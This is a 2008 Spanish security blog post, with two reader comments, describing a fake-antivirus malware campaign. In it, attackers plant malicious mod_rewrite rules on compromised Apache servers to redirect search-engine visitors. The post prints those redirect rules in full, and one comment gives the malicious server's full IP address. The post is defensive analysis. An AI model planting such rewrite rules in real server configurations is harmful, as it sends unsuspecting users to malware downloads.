Skip to content

Falsos sitios antivirus para la diseminación de malware

Publicado por Sergio Hernando el 16 septiembre 2008

Hola,

Publican en SANS
un tristemente habitual y elaborado intento de engaño a usuarios, que tiene como protagonista a un supuesto antivirus. El mecanismo de acción es el siguiente:

1. Mediante compromiso del servidor Apache, se introducen reglas maliciosas para mod_rewrite. Estas reglas provocarán que el tráfico entrante, procedente de Google, AOL y otros servicios de búsqueda, sea redirigido a un sitio malicioso, ubicado en http://X.X.180.88/in.html?s=hg (atención, en SANS publican el enlace completo y el sitio está activo). Los usuarios desprevenidos que utilicen estos buscadores y sigan enlaces aparentemente legítimos de la empresa o servicio cuyo servidor está comprometido, acabarán siendo redirigido a un sitio malicioso. Las reglas de reescritura son, para este ejemplo concreto:

# RewriteEngine On
# RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
# RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
# RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
# RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
# RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
# RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
# RewriteRule .* http://X.X.180.88/in.html?s=hg [R,L]
# Errordocument 404 http://X.X.180.88/in.html?s=hg_err

2. En el sitio malicioso se instala una elaborada animación que se reproduce cuando el usuario es redirigido. Esta animación invita a instalar un ejecutable llamado antivirus.v.1.0.20586.exe, despues de mostrar un presunto escaneo de seguridad del equipo que finaliza informándonos que estamos infectados. El usuario confía en el resultado, y descarga el ejecutable.

3. El ejecutable pasa inadvertido por los antivirus (ninguno de los motores de Jotti lo califica de sospechoso o infectado) y con toda probabilidad (no he podido verificarlo) instala malware en el equipo del usuario. Otros resultados del análisis podéis verlos en Virus.org, donde el análisis finaliza con un rotundo Potentially Clean (Confidence 100.00%). Incluso imaginando que no se trate de un ejecutable malicioso, o que sea una prueba de concepto limpia de los atacantes para ver qué tal funcionan las redirecciones, es obvio que la estrategia está pensada para poner a la disposición de los usuarios ejecutables maliciosos, que sin duda, contendrán todo tipo de malware.

Los redirectores, en todas sus variantes, están teniendo un auge especial últimamente. Este tipo de redirección funciona especialmente bien porque provoca confianza en los usuarios. Si alguien pone en Google "linux", y observa un resultado aparentemente legítimo, como http://es.wikipedia.org/wiki/Linux, muy probablemente dará por sentado que es seguro, y pulsará sobre él, confiando en que aterrizará en la Wikipedia. Si el servidor de la Wikipedia está comprometido y el usuario es redirigido a un sitio malicioso, la primera barrera está vencida. En ese momento tan sólo queda esperar que una amplia mayoría de visitantes descargarán e instalarán todo lo que la página les solicite.

Ante este tipo de ataques cuesta dar el consejo tradicional de "visite sólo sitios confiables", porque si el sitio confiable está comprometido se nos caen los palos del sombrajo. Es por tanto que el consejo natural que surge es otro de los clásicos: no descargar ni ejecutar programas de los que no estemos absolutamente seguros, en términos de procedencia y utilidad. Y si tenemos dudas, preguntemos a quien nos pueda asesorar.

Más información sobre falsos sitios antivirus en el blog de Dancho Danchev. También se habla de redirectores en el último informe de S21Sec sobre fraude online (descargable previa petición)

Un saludo,

Be Sociable, Share!

Categoría/s → Malware

2 comentarios
  1. 16 septiembre 2008
    jcbarreto permalink

    Respecto a “http://X.X.180.88/in.html?s=hg”

    a)… Firefox 3 / Google advierten [a un % de usuarios] con … http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=es-ES&site=http://87.248.180.88/in.html?s=hg

    Desconozco desde cuándo realmente, aunque el texto ofrece indicios.

    b) … http://www.mywot.com advierte con …

    http://www.mywot.com/es/scorecard/87.248.180.88

    Si tenéis algo de dinero, invertirlo en google.

  2. 16 septiembre 2008
    jcbarreto permalink

    Por cierto, el método de ataque (redirección) me parece brillante.

    La definición de “sitio confiable” varía en función del año. No es lo mismo un sitio confiable 2008 que un sitio confiable en 2004.

    Gracias por la referencia,

Escribir un comentario

Note: XHTML permitido. Tu email nunca será publicado.

Suscribirse a los comentarios via RSS